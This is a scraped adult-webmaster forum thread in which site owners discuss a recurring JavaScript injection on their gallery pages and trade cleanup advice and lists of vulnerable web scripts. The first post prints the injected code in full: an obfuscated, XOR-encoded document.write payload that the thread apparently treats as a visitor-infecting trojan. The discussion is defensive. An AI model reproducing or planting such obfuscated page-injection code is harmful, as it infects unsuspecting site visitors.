![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
javascript trojan on my tgp
the following javascript code keeps on reappearing on my tgp site. has everyone delt with this trojan before? i can temporary remove it by deleting my index.shtml file and rebuilding it but it keeps coming back. here's the javascript code:
<script language="JavaScript"> e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str); </script> my system was infected with a trojan but its been cleaned and removed. please advise. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 |
Confirmed User
Join Date: Mar 2004
Location: → → →
Posts: 1,717
|
you are not alone. There are a whole bunch of sites out there getting hit.
Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
Confirmed User
Industry Role:
Join Date: Dec 2001
Posts: 7,952
|
What tgp and trading scripts are you using?
Are you running phpbb by chance on the server? |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 | |
Confirmed User
Join Date: Jul 2001
Location: Teh Interweb
Posts: 2,439
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 |
rockin tha trailerpark
Industry Role:
Join Date: May 2001
Location: ~Coastal~
Posts: 23,088
|
whats it do, prompt to download an exe?
__________________
__________ Loadedca$h - get sum! - Revengebucks - mmm rebills! - webair (gotz sErVrz) ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
i just changed my admin password in case and deleted my infected index.shtml file and rebuilt the page. it's clean now but the javascript code usually reappears within a few hours. hopefully not this time. <crosses fingers> |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 |
rockin tha trailerpark
Industry Role:
Join Date: May 2001
Location: ~Coastal~
Posts: 23,088
|
yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
__________________
__________ Loadedca$h - get sum! - Revengebucks - mmm rebills! - webair (gotz sErVrz) ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 | |
Confirmed User
Join Date: Jul 2001
Location: Teh Interweb
Posts: 2,439
|
Quote:
I haven?t encountered your specific dilemma however so I can?t vouch for what their terms of service are in each particular instance of support requests. Perhaps try hitting them up again? I wish I could assist however I?m all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#12 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 | |
Confirmed User
Join Date: Jul 2001
Location: Teh Interweb
Posts: 2,439
|
Quote:
Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 |
►SouthOfHeaven
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
|
dude contact webair and tell them to tell you what the problem is for sure , you shouldnt be left guessing.. or find a new host..
Im with webair , and they have always answered my questions promtly , sometimes people give bland answers ask for facts.. alot of people asking me about this trojan lately.. prob the "spysheriff" verio.s and its prob set to a cronjob or something on a schedult to reinfect you so it wont just "go away " on its own or by deleting anything do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure your up to date..
__________________
hatisblack at yahoo.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 | |
Confirmed User
Join Date: Jul 2001
Location: Teh Interweb
Posts: 2,439
|
Quote:
http://www.gofuckyourself.com/showthread.php?t=611063 http://www.gofuckyourself.com/showthread.php?t=561290 http://www.gofuckyourself.com/showthread.php?t=559591 |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
Confirmed User
Join Date: Feb 2003
Location: DeltaHell
Posts: 3,216
|
If you have access to raw logs check to see if it was just placed on the page and uploaded - this has been the most common way pages had this installed - most likely due to someone with access to a password file as there is never any intrusion attempts and the page is just ftp'd - most people that were hit were using a common password on their server and either a processing program or sponsor (we havent found the common one yet to figure out who's password list was compromised)
The second way is one of these programs with security holes: Vbulletin PHPBB Autolinks Invision Power Board phpmyadmin phpadsnew wordpress awstats 6.5 sitedepth I-RATER phpBazar Most of these have recently released updates for their security holes |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#19 |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
i don't have access to raw log files but i changed my admin password before i went to bed and my page is still clean.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 |
Confirmed User
Join Date: Mar 2004
Location: → → →
Posts: 1,717
|
Have you checked the templates in your scripts?
Here are a few more url's with the same script, in case anyone knows the owners. wanktool.com teensinboots.com/index.shtml technorgasmic.com nastylatex.com/index.shtml pornlinks-united.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#21 |
Confirmed User
Join Date: Nov 2005
Location: UK
Posts: 571
|
As far as i know its the guy that does it is using an exploit in autogallery to stick the trojan on your site.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#22 | |
Confirmed User
Industry Role:
Join Date: Aug 2003
Location: Canada
Posts: 2,310
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#23 |
Confirmed User
Join Date: Feb 2002
Location: Third mall from the sun
Posts: 2,185
|
I got it a week or so ago and so far it only appeared just that once. The only scripts I am using on that site are phpadsnew and Links 2.0
__________________
I was looking for a job, and then I found a job And heaven knows I'm miserable now |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#24 |
Confirmed User
Join Date: Aug 2003
Location: Burnaby BC
Posts: 781
|
Yup had it as well. just deleted the code and changed my server password
__________________
Do you need design work done. I am available check out my site TMC Web Designs |
![]() |
![]() ![]() ![]() ![]() ![]() |